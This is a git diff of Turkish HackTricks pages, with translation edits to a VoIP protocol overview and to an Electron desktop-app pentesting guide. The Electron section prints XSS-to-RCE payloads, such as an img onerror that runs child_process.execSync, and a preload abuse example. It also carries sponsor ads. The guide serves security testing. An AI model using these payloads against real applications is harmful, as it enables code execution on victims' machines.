@ -52,81 +52,69 @@ MGCP (Media Gateway Control Protocol), RFC 3435'te belirtilen bir **sinyal** ve
|
|||
|
||||
Skinny Client Control Protocol (SCCP), Cisco Systems'e ait **özel bir sinyal ve çağrı kontrol protokolü**dür. Öncelikle **Cisco Unified Communications Manager** (eskiden CallManager olarak bilinir) ile Cisco IP telefonları veya diğer Cisco ses ve video uç noktaları arasındaki iletişimde **kullanılır**.
|
||||
|
||||
SCCP, çağrı kontrol sunucusu ile uç nokta cihazlar arasındaki iletişimi basitleştiren hafif bir protokoldür. "Skinny" olarak adlandırılmasının nedeni, minimal tasarımı ve diğer VoIP protokolleri olan H.323 veya SIP gibi protokollere kıyasla daha az bant genişliği gereksinimleridir.
|
||||
SCCP, çağrı kontrol sunucusu ile uç nokta cihazlar arasındaki iletişimi basitleştiren hafif bir protokoldür. "Skinny" olarak adlandırılmasının nedeni, minimal tasarımı ve diğer VoIP protokolleri olan H.323 veya SIP'e kıyasla azaltılmış bant genişliği gereksinimleridir.
|
||||
|
||||
SCCP tabanlı bir sistemin başlıca bileşenleri şunlardır:
|
||||
|
||||
1. **Çağrı Kontrol Sunucusu**: Genellikle Cisco Unified Communications Manager olan bu sunucu, çağrı kurulumu, değişiklik ve sonlandırma işlemlerini yönetir, ayrıca çağrı yönlendirme, çağrı aktarma ve çağrı tutma gibi diğer telefon özelliklerini de sağlar.
|
||||
2. **SCCP Uç Noktaları**: Bunlar, çağrı kontrol sunucusu ile iletişim kurmak için SCCP'yi kullanan IP telefonları, video konferans birimleri veya diğer Cisco ses ve video uç noktaları gibi cihazlardır. Sunucuya kaydolurlar, sinyal mesajları gönderir ve alırlar ve çağrı yönlendirme için çağrı kontrol sunucusu tarafından verilen talimatları takip ederler.
|
||||
3. **Ağ Geçitleri**: Bu cihazlar, ses akışlarını farklı ağlar arasında dönüştürmekten sorumludur, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
|
||||
3. **Ağ Geçitleri**: Bu cihazlar, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında medya akışlarını dönüştürmekten sorumludur. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
|
||||
|
||||
SCCP, Cisco çağrı kontrol sunucuları ile uç nokta cihazlar arasında basit ve verimli bir iletişim yöntemi sunar. Ancak, **SCCP özel bir protokoldür**, bu da onun Cisco dışı sistemlerle uyumluluğunu sınırlayabilir. Bu tür durumlarda, SIP gibi diğer standart VoIP protokolleri daha uygun olabilir.
|
||||
SCCP, Cisco çağrı kontrol sunucuları ile uç nokta cihazlar arasında basit ve verimli bir iletişim yöntemi sunar. Ancak, **SCCP özel bir protokoldür**, bu da onun non-Cisco sistemlerle uyumluluğunu sınırlayabilir. Bu tür durumlarda, SIP gibi diğer standart VoIP protokolleri daha uygun olabilir.
|
||||
|
||||
### H.323
|
||||
|
||||
H.323, ses, video ve veri konferansları da dahil olmak üzere çoklu ortam iletişimi için bir dizi protokoldür, IP tabanlı ağlar gibi paket anahtarlamalı ağlar üzerinden ses, video ve veri konferansları sağlar. Uluslararası Telekomünikasyon Birliği (ITU-T) tarafından geliştirilmiş olup çoklu ortam iletişim oturumlarını yönetmek için kapsamlı bir çerçeve sunar.
|
||||
H.323, ses, video ve veri konferansları da dahil olmak üzere çoklu ortam iletişimi için bir dizi protokoldür, IP tabanlı ağlar gibi paket anahtarlamalı ağlar üzerinden ses, video ve veri konferansları için geliştirilmiştir. Uluslararası Telekomünikasyon Birliği (ITU-T) tarafından geliştirilmiş olup çoklu ortam iletişim oturumlarını yönetmek için kapsamlı bir çerçeve sunar.
|
||||
|
||||
H.323 paketinin bazı temel bileşenleri şunları içerir:
|
||||
|
||||
1. **Uç Noktalar**: Bu, H.323'ü destekleyen IP telefonlar, video konferans sistemleri veya yazılım uygulamaları gibi uç nokta cihazlarıdır ve çoklu ortam iletişim oturumlarına katılabilirler.
|
||||
2. **Ağ Geçitleri**: Bu cihazlar, farklı ağlar arasında medya akışlarını dönüştürür, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında etkileşim sağlar. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
|
||||
3. **Geçit Kontrolcüleri**: Bu, bir H.323 ağında çağrı kontrolü ve yönetim hizmetleri sağlayan isteğe bağlı bileşenlerdir. Adres çevirme, bant genişliği yönetimi ve kabul kontrolü gibi işlevleri gerçekleştirir, ağ kaynaklarını yönetmeye ve optimize etmeye yardımcı olur.
|
||||
4. **Çok Noktalı Kontrol Birimleri (MCU'lar)**: Bu cihazlar, çok noktalı konferansları yöneterek birden fazla uç noktadan gelen medya akışlarını yönetir ve karıştırır. MCU'lar, video düzen kontrolü, sesle etkinleştirilmiş anahtarlamalar ve sürekli varlık gibi özellikleri destekleyerek, çok sayıda katılımcıyla büyük ölçekli konferanslar düzenlemeyi mümkün kılar.
|
||||
2. **Ağ Geçitleri**: Bu cihazlar, geleneksel devre anahtarlamalı telefonculuk ve paket anahtarlamalı IP ağları arasında medya akışlarını dönüştürür, H.323 ve diğer iletişim sistemleri arasında etkileşim sağlar. Transkodlama veya yankı iptali gibi ek işlevleri de içerebilirler.
|
||||
3. **Geçiş Kontrolcüleri**: Bu, bir H.323 ağında çağrı kontrolü ve yönetim hizmetleri sağlayan isteğe bağlı bileşenlerdir. Adres çevirme, bant genişliği yönetimi ve kabul kontrolü gibi işlevleri gerçekleştirir, ağ kaynaklarını yönetmeye ve optimize etmeye yardımcı olur.
|
||||
4. **Çok Noktalı Kontrol Birimleri (MCU'lar)**: Bu cihazlar, çoklu uç noktalı konferansları yöneterek birden fazla uç noktadan gelen medya akışlarını yönetir ve karıştırır. MCU'lar, video düzen kontrolü, sesle etkinleştirilmiş anahtarlamalar ve sürekli varlık gibi özellikleri destekleyerek, çok sayıda katılımcıyla büyük ölçekli konferanslar düzenlemeyi mümkün kılar.
|
||||
|
||||
H.323, bir dizi ses ve video kodekini destekler ve çağrı yönlendirme, çağrı aktarma, çağrı tutma ve çağrı bekleme gibi diğer ek hizmetleri de içerir. VoIP'in erken günlerinde geniş bir şekilde benimsenmesine rağmen, H.323, daha modern ve esnek protokoller olan **Session Initiation Protocol (SIP)** tarafından yavaş yavaş değiştirilmiştir, bu da daha iyi uyumluluk ve daha kolay uygulama sağlar. Bununla birlikte, H.323, birçok eski sistemde kullanılmaya devam etmekte ve çeşitli ekipman satıcıları tarafından desteklenmektedir.
|
||||
H.323, bir dizi ses ve video kodekini destekler ve çağrı yönlendirme, çağrı aktarma, çağrı tutma ve çağrı bekleme gibi diğer ek hizmetleri de içeren diğer destekleyici hizmetleri destekler. VoIP'in erken günlerinde geniş bir şekilde benimsenmesine rağmen, H.323, daha modern ve esnek protokoller olan **Session Initiation Protocol (SIP)** tarafından yavaş yavaş değiştirilmiş ve daha iyi etkileşim ve daha kolay uygulama sağlamıştır. Bununla birlikte, H.323, birçok eski sistemde kullanılmaya devam etmekte ve çeşitli ekipman satıcıları tarafından desteklenmeye devam etmektedir.
|
||||
|
||||
### IAX (Inter Asterisk eXchange)
|
||||
|
||||
IAX (Inter-Asterisk eXchange), Asterisk PBX (Private Branch Exchange) sunucuları ile diğer VoIP cihazları arasındaki iletişimde **kullanılan bir sinyal ve çağrı kontrol protokolü**dür. Asterisk açık kaynaklı PBX yazılımının yaratıcısı Mark Spencer tarafından, SIP ve H.323 gibi diğer VoIP protokollerine alternatif olarak geliştirilmiştir.
|
||||
|
||||
IAX, **basitlik, verimlilik ve uygulanabilirlik kolaylığı** ile tanınır. IAX'in bazı temel özellikleri şunlardır:
|
||||
IAX, **basitlik, verimlilik ve uygulama kolaylığı** ile tanınır. IAX'in bazı temel özellikleri şunlardır:
|
||||
|
||||
1. **Tek UDP Portu**: IAX, hem sinyal hem de medya trafiği için tek bir UDP portu (4569) kullanır, bu da güvenlik duvarı ve NAT geçişi basitleştirir ve çeşitli ağ ortamlarında dağıtımı kolaylaştırır.
|
||||
1. **Tek UDP Portu**: IAX, hem sinyal hem de medya trafiği için tek bir UDP portu (4569) kullanır, bu da güvenlik duvarı ve NAT geçişi işlemlerini basitleştirir ve çeşitli ağ ortamlarında dağıtımı kolaylaştırır.
|
||||
2. **İkili Protokol**: SIP gibi metin tabanlı protokollerin aksine, IAX ikili bir protokoldür, bu da bant genişliği tüketimini azaltır ve sinyal ve medya verilerini iletmek için daha verimli hale getirir.
|
||||
3. **Trunking**: IAX, birden fazla çağrının tek bir ağ bağlantısına birleştirilmesine izin veren trunking'i destekler, bu da aşırı başlık maliyetini azaltır ve bant genişliği kullanımını iyileştirir.
|
||||
4. **Doğal Şifreleme**: IAX, RSA gibi yöntemlerle anahtar değişimi ve AES gibi medya şifrelemesi için kullanılan şifrelemeyi destekler, uç noktalar arasında güvenli iletişim sağlar.
|
||||
5. **Eşten Eşe İletişim**: IAX, merkezi bir sunucuya gerek olmadan uç noktalar arasında doğrudan iletişim için kullanılabilir, bu da çağrı yönlendirmeyi daha basit ve verimli hale getirir.
|
||||
3. **Trunking**: IAX, birden fazla çağrının tek bir ağ bağlantısına birleştirilmesine izin veren trunking'i destekler, bu da aşırı başlık maliyetini azaltır ve bant genişliği kullanımını artırır.
|
||||
4. **Doğal Şifreleme**: IAX, RSA gibi yöntemler kullanarak anahtar değişimi ve AES gibi medya şifrelemesi için şifrelemeyi destekler, uç noktalar arasında güvenli iletişimi sağlar.
|
||||
5. **Eşten Eşe İletişim**: IAX, merkezi bir sunucuya gerek olmadan uç noktalar arasında doğrudan iletişim için kullanılabilir, bu da daha basit ve daha verimli çağrı yönlendirmeyi sağlar.
|
||||
|
||||
Avantajlarına rağmen, IAX'in Asterisk ekosistemi üzerinde odaklanması ve daha yaygın olarak benimsenmiş protokollere kıyasla daha az yaygın kullanımı gibi bazı sınırlamaları vardır. Sonuç olarak, IAX, Asterisk ortamında çalışanlar için VoIP iletişimi için güçlü ve verimli bir çözüm sunabilir.
|
||||
Avantajlarına rağmen, IAX'in Asterisk ekosistemi üzerinde odaklanması ve daha yaygın olarak benimsenmiş protokollere kıyasla daha az yaygın kullanılması gibi bazı kısıtlamaları vardır. Sonuç olarak, IAX, Asterisk ortamında çalışanlar için VoIP iletişimi için güçlü ve verimli bir çözüm sunabilir.
|
||||
## Aktarım ve Taşıma Protokolleri
|
||||
|
||||
### SDP (Session Description Protocol)
|
||||
|
||||
SDP (Session Description Protocol), ses, video veya veri konferansları gibi multimedya oturumlarının özelliklerini tanımlamak için kullanılan **metin tabanlı bir formattır** ve IP ağları üzerinden iletilir. **Internet Engineering Task Force (IETF)** tarafından geliştirilmiş olup **RFC 4566**'da tanımlanmıştır. SDP, gerçek medya iletimini veya oturum kurulumunu ele almaz ancak diğer sinyal protokolleriyle, örneğin **SIP (Session Initiation Protocol)** ile birlikte kullanılarak medya akışları ve özellikleri hakkında bilgi alışverişi yapmak için kullanılır.
|
||||
SDP (Session Description Protocol), ses, video veya veri konferansları gibi multimedya oturumlarının özelliklerini tanımlamak için kullanılan **metin tabanlı bir formattır** ve IP ağları üzerinden iletilir. **Internet Engineering Task Force (IETF)** tarafından geliştirilmiş olup **RFC 4566**'da tanımlanmıştır. SDP, gerçek medya iletimini veya oturum kurulumunu ele almaz ancak diğer sinyal protokolleriyle, örneğin **SIP (Session Initiation Protocol)** ile birlikte kullanılarak medya akışları ve özellikleri hakkında bilgi alışverişi ve müzakere yapmak için kullanılır.
|
||||
|
||||
SDP'nin bazı temel unsurları şunlardır:
|
||||
|
||||
1. **Oturum Bilgileri**: SDP, oturum adı, oturum açıklaması, başlangıç zamanı ve bitiş zamanı gibi multimedya oturumlarının ayrıntılarını tanımlar.
|
||||
1. **Oturum Bilgileri**: SDP, oturum adı, oturum açıklaması, başlangıç zamanı ve bitiş zamanı gibi bir multimedya oturumunun ayrıntılarını tanımlar.
|
||||
2. **Medya Akışları**: SDP, medya türü (ses, video veya metin), taşıma protokolü (örneğin, RTP veya SRTP) ve medya formatı (örneğin, codec bilgisi) gibi medya akışlarının özelliklerini tanımlar.
|
||||
3. **Bağlantı Bilgileri**: SDP, medyanın gönderilip alınması gereken ağ adresi (IP adresi) ve port numarası hakkında bilgi sağlar.
|
||||
4. **Öznitelikler**: SDP, oturum veya medya akışı hakkında ek, isteğe bağlı bilgiler sağlamak için öznitelikleri destekler. Öznitelikler, şifreleme anahtarları, bant genişliği gereksinimleri veya medya kontrol mekanizmaları gibi çeşitli özellikleri belirtmek için kullanılabilir.
|
||||
|
||||
SDP genellikle aşağıdaki süreçte kullanılır:
|
||||
|
||||
1. Başlatan taraf, önerilen multimedya oturumunun SDP açıklamasını oluşturur; medya akışlarının ayrıntılarını ve özelliklerini içerir.
|
||||
2. SDP açıklaması, genellikle SIP veya RTSP gibi bir sinyal protokolü mesajının içine gömülü olarak alıcı tarafa gönderilir.
|
||||
1. Başlatan taraf, önerilen multimedya oturumunun SDP açıklamasını oluşturur, medya akışlarının ayrıntılarını ve özelliklerini içerir.
|
||||
2. SDP açıklaması, genellikle SIP veya RTSP gibi bir sinyal protokolü ile gömülü olarak alıcı tarafa gönderilir.
|
||||
3. Alıcı taraf, SDP açıklamasını işler ve yeteneklerine bağlı olarak önerilen oturumu kabul edebilir, reddedebilir veya değiştirebilir.
|
||||
4. Son SDP açıklaması, müzakere sürecini tamamlayan bir sinyal protokolü mesajının bir parçası olarak başlatan tarafa geri gönderilir.
|
||||
|
||||
SDP'nin basitliği ve esnekliği, çeşitli iletişim sistemlerinde multimedya oturumlarını tanımlamak için yaygın olarak benimsenen bir standart olmasını sağlar ve IP ağları üzerinden gerçek zamanlı multimedya oturumlarının kurulmasında ve yönetilmesinde kritik bir rol oynar.
|
||||
SDP'nin basitliği ve esnekliği, çeşitli iletişim sistemlerinde multimedya oturumlarını tanımlamak için yaygın olarak kabul edilen bir standart olmasını sağlar ve IP ağları üzerinden gerçek zamanlı multimedya oturumlarını kurma ve yönetmede kritik bir rol oynar.
|
||||
|
||||
### RTP / RTCP / SRTP / ZRTP
|
||||
|
||||
1. **RTP (Real-time Transport Protocol)**: RTP, ses ve video verileri veya diğer gerçek zamanlı medyaların IP ağları üzerinden iletilmesi için tasarlanmış bir ağ protokolüdür. **IETF** tarafından geliştirilmiş ve **RFC 3550**'de tanımlanmıştır. RTP genellikle SIP ve H.323 gibi sinyal protokolleriyle birlikte kullanılarak multimedya iletişimini sağlar. RTP, medya akışlarının **senkronizasyonu**, **sıralaması** ve **zaman damgası** için mekanizmalar sağlar, böylece akıcı ve zamanında medya oynatımını sağlar.
|
||||
2. **RTCP (Real-time Transport Control Protocol)**: RTCP, RTP'nin yanında kullanılan, hizmet kalitesini (QoS) izlemek ve medya akışlarının iletimi hakkında geri bildirim sağlamak için kullanılan bir protokoldür. RTP ile aynı **RFC 3550**'de tanımlanmış olup RTCP, bir RTP oturumundaki katılımcılar arasında **periyodik olarak kontrol paketleri alışverişi yapar**. Paket kaybı, jitter ve gecikme gibi bilgileri paylaşarak ağ koşullarını teşhis etmeye ve buna uyum sağlamaya yardımcı olur, genel medya kalitesini artırır.
|
||||
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP, medya akışları için **şifreleme**, **mesaj doğrulama** ve **tekrar koruması** sağlayan RTP'nin bir uzantısıdır ve hassas ses ve video verilerinin güvenli iletimini sağlar. **RFC 3711**'de tanımlanmış olup SRTP, şifreleme için AES gibi kriptografik algoritmalar ve mesaj doğrulama için HMAC-SHA1 kullanır. SRTP genellikle, multimedya iletişiminde uçtan uca güvenlik sağlamak için SIP üzerinden TLS ile birlikte kullanılır.
|
||||
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP, RTP medya akışları için **uçtan uca şifreleme** sağlayan bir kriptografik anahtar anlaşma protokolüdür. PGP'nin yaratıcısı Phil Zimmermann tarafından geliştirilmiş olup **RFC 6189**'da tanımlanmıştır. SRTP'nin aksine, ZRTP, anahtar değişimi için sinyal protokollerine güvenmek yerine bağımsız olarak çalışacak şekilde tasarlanmıştır. İletişim kuran taraflar arasında bir paylaşılan sır oluşturmak için **Diffie-Hellman anahtar değişimi** kullanır ve önceden güven veya bir genel anahtar altyapısı (PKI) gerektirmez. ZRTP, **Man-in-the-Middle** saldırılarına karşı koruma sağlamak için **Kısa Kimlik Doğrulama Dizileri (SAS)** gibi özellikler de içerir.
|
||||
1. **RTP (Real-time Transport Protocol)**: RTP, ses ve video verileri veya diğer gerçek zamanlı medyaların IP ağları üzerinden iletilmesi için tasarlanmış bir ağ protokolüdür. **IETF** tarafından geliştirilmiş ve **RFC 3550**'de tanımlanmıştır. RTP genellikle SIP ve H.323 gibi sinyal protokolleri ile birlikte kullanılarak multimedya iletişimini sağlar. RTP, medya akışlarının **senkronizasyonu**, **sıralaması** ve **zaman damgalama** için mekanizmalar sağlar, böylece akıcı ve zamanında medya oynatımını sağlar.
|
||||
2. **RTCP (Real-time Transport Control Protocol)**: RTCP, RTP'nin bir eş protokolü olup hizmet kalitesini (QoS) izlemek ve medya akışlarının iletimi hakkında geri bildirim sağlamak için kullanılır. RTP ile aynı **RFC 3550**'de tanımlanan RTCP, bir RTP oturumundaki katılımcılar arasında **periyodik olarak kontrol paketleri alışverişi yapar**. Paket kaybı, jitter ve gecikme gibi bilgileri paylaşarak ağ koşullarını teşhis etmeye ve uyum sağlamaya yardımcı olur, genel medya kalitesini artırır.
|
||||
3. **SRTP (Secure Real-time Transport Protocol)**: SRTP, medya akışları için **şifreleme**, **mesaj doğrulama** ve **tekrar koruma** sağlayan RTP'nin bir uzantısıdır ve hassas ses ve video verilerinin güvenli iletimini sağlar. **RFC 3711**'de tanımlanan SRTP, şifreleme için AES gibi kriptografik algoritmalar ve mesaj doğrulama için HMAC-SHA1 kullanır. SRTP genellikle SIP üzerinden TLS ile güvenli sinyal protokolleri ile birlikte kullanılarak multimedya iletişiminde uçtan uca güvenlik sağlar.
|
||||
4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP, RTP medya akışları için **uçtan uca şifreleme** sağlayan bir kriptografik anahtar anlaşma protokolüdür. PGP'nin yaratıcısı Phil Zimmermann tarafından geliştirilen ZRTP, **RFC 6189**'da tanımlanmıştır. SRTP'nin aksine, ZRTP, anahtar değişimi için sinyal protokollerine güvenmek yerine bağımsız olarak çalışacak şekilde tasarlanmıştır. İletişim kuran taraflar arasında bir paylaşılan sır oluşturmak için **Diffie-Hellman anahtar değişimi** kullanır ve önceki güven veya bir genel anahtar altyapısı (PKI) gerektirmez. ZRTP, **Orta Adam Saldırılarına Karşı Kısa Kimlik Dizeleri (SAS)** gibi özellikler de içerir.
|
||||
|
||||
Bu protokoller, IP ağları üzerinden **gerçek zamanlı multimedya iletişiminin iletilmesi ve güvenliğinin sağlanmasında** temel roller oynar. RTP ve RTCP gerçek medya iletimini ve kalite izlemeyi ele alırken, SRTP ve ZRTP, iletilen medyanın dinlenmeye, değiştirilmeye ve tekrar oynatılmaya karşı korunduğundan emin olur.
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
Bu protokoller, IP ağları üzerinden **gerçek zamanlı multimedya iletişiminin iletilmesi ve güvenliğinin sağlanmasında** temel roller oynar. RTP ve RTCP gerçek medya iletimini ve kalite izleme işlemlerini yönetirken, SRTP ve ZRTP, iletilen medyanın dinlenme, değiştirme ve tekrar saldırılarına karşı korunduğundan emin olur.
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>'ı öğrenin!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -32,7 +32,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
Electron, yerel bir arka uç (ile **NodeJS**) ve bir ön uç (**Chromium**) birleştirir, ancak modern tarayıcıların bazı güvenlik mekanizmalarını eksikliği vardır.
|
||||
|
||||
Genellikle, electron uygulama kodunu bir `.asar` uygulamasının içinde bulabilirsiniz, kodu elde etmek için onu çıkartmanız gerekir:
|
||||
Genellikle electron uygulama kodunu bir `.asar` uygulamasının içinde bulabilirsiniz, kodu elde etmek için onu çıkartmanız gerekir:
|
||||
```bash
|
||||
npx asar extract app.asar destfolder #Extract everything
|
||||
npx asar extract-file app.asar main.js #Extract just a file
|
||||
|
@ -58,18 +58,18 @@ let win = new BrowserWindow();
|
|||
//Open Renderer Process
|
||||
win.loadURL(`file://path/to/index.html`);
|
||||
```
|
||||
**Renderer işlemi**nin ayarları, main.js dosyası içinde **ana işlem**de **ayarlanabilir**. Bazı yapılandırmalar, **ayarlar doğru bir şekilde yapılandırıldığında**, Electron uygulamasının RCE veya diğer güvenlik açıklarını **engelleyebilir**.
|
||||
**Renderer süreci**nin ayarları, main.js dosyası içinde **ana süreçte** yapılandırılabilir. Ayarların doğru şekilde yapılandırılması, bazı konfigürasyonların Electron uygulamasının **Uzaktan Kod Çalıştırma (RCE)** veya diğer güvenlik açıklarını **engellemesini sağlayacaktır**.
|
||||
|
||||
Electron uygulaması, Node API'leri aracılığıyla cihaza **erişebilir** ancak bunu **engellemek için yapılandırılabilir**:
|
||||
Electron uygulaması, Node API'leri aracılığıyla cihaza erişebilir, ancak bunu engellemek için yapılandırılabilir:
|
||||
|
||||
* **`nodeIntegration`** - varsayılan olarak `kapalı`dır. Açık olduğunda, renderer işleminden Node özelliklerine erişime izin verir.
|
||||
* **`contextIsolation`** - varsayılan olarak `açık`tır. Kapalı olduğunda, ana ve renderer işlemleri izole edilmez.
|
||||
* **`nodeIntegration`** - varsayılan olarak `kapalı`dır. Etkinleştirildiğinde, renderer sürecinden Node özelliklerine erişime izin verir.
|
||||
* **`contextIsolation`** - varsayılan olarak `açık`tır. Kapatıldığında, ana ve renderer süreçleri izole edilmez.
|
||||
* **`preload`** - varsayılan olarak boştur.
|
||||
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - varsayılan olarak kapalıdır. NodeJS'nin gerçekleştirebileceği işlemleri kısıtlayacaktır.
|
||||
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - varsayılan olarak kapalıdır. NodeJS'in gerçekleştirebileceği eylemleri kısıtlayacaktır.
|
||||
* İşçilerde Node Entegrasyonu
|
||||
* **`nodeIntegrationInSubframes`** - varsayılan olarak `kapalı`dır.
|
||||
* Eğer **`nodeIntegration`** etkinse, bu, Electron uygulaması içindeki iframlarda yüklenen web sayfalarında **Node.js API'lerinin** kullanımına izin verecektir.
|
||||
* Eğer **`nodeIntegration`** devre dışı bırakılmışsa, ön yüklemeler iframda yüklenecektir.
|
||||
* Eğer **`nodeIntegration`** etkinse, bu, Electron uygulaması içindeki iframlarda yüklenen web sayfalarında **Node.js API'lerinin kullanımına izin verecektir**.
|
||||
* Eğer **`nodeIntegration`** devre dışı bırakılmışsa, preload'lar iframda yüklenecektir.
|
||||
|
||||
Yapılandırma örneği:
|
||||
```javascript
|
||||
|
@ -97,7 +97,7 @@ spellcheck: true
|
|||
}
|
||||
};
|
||||
```
|
||||
İşte [buradan](https://7as.es/electron/nodeIntegration\_rce.txt) bazı **RCE yükleri**:
|
||||
Aşağıda **buradan** bazı RCE yükleri bulunmaktadır: [buradan](https://7as.es/electron/nodeIntegration\_rce.txt):
|
||||
```html
|
||||
Example Payloads (Windows):
|
||||
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
|
||||
|
@ -117,7 +117,7 @@ Başlangıç ana yapılandırmasını değiştirin ve şöyle bir proxy kullanı
|
|||
```
|
||||
## Electron Yerel Kod Enjeksiyonu
|
||||
|
||||
Bir Electron Uygulamasını yerel olarak yürütebiliyorsanız, keyfi JavaScript kodunu yürütmesini sağlayabilirsiniz. Nasıl yapılacağını kontrol edin:
|
||||
Bir Electron Uygulamasını yerel olarak çalıştırabilirseniz, keyfi JavaScript kodunu çalıştırmasını sağlayabilirsiniz. Nasıl yapılacağını kontrol edin:
|
||||
|
||||
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md" %}
|
||||
[macos-electron-applications-injection.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md)
|
||||
|
@ -125,7 +125,7 @@ Bir Electron Uygulamasını yerel olarak yürütebiliyorsanız, keyfi JavaScript
|
|||
|
||||
## Uzaktan Kod Çalıştırma: XSS + nodeIntegration
|
||||
|
||||
Eğer **nodeIntegration** **on** olarak ayarlanmışsa, bir web sayfasının JavaScript'i `require()` çağrısını yaparak Node.js özelliklerini kolayca kullanabilir. Örneğin, Windows üzerinde hesap makinesini çalıştırmanın yolu:
|
||||
Eğer **nodeIntegration** **açık** olarak ayarlanmışsa, bir web sayfasının JavaScript'i, `require()` fonksiyonunu çağırarak Node.js özelliklerini kolayca kullanabilir. Örneğin, Windows'ta hesap makinesini çalıştırmanın yolu:
|
||||
```html
|
||||
<script>
|
||||
require('child_process').exec('calc');
|
||||
|
@ -146,7 +146,7 @@ preload: _path2.default.join(__dirname, 'perload.js'),
|
|||
}
|
||||
});
|
||||
```
|
||||
Bu nedenle, betik node özelliklerini sayfalara dışa aktarabilir:
|
||||
Bu nedenle, betik node özelliklerini sayfalara dışa aktarabilir:
|
||||
|
||||
{% code title="preload.js" %}
|
||||
```javascript
|
||||
|
@ -174,13 +174,13 @@ runCalc();
|
|||
|
||||
## Uzaktan Kod Çalıştırma: XSS + contextIsolation
|
||||
|
||||
_**contextIsolation**_, **web sayfası betikleri ile JavaScript Electron'un dahili kodu arasında ayrı bağlamlar** tanıtarak her kodun JavaScript yürütmesinin birbirini etkilememesini sağlar. Bu, RCE olasılığını ortadan kaldırmak için gerekli bir özelliktir.
|
||||
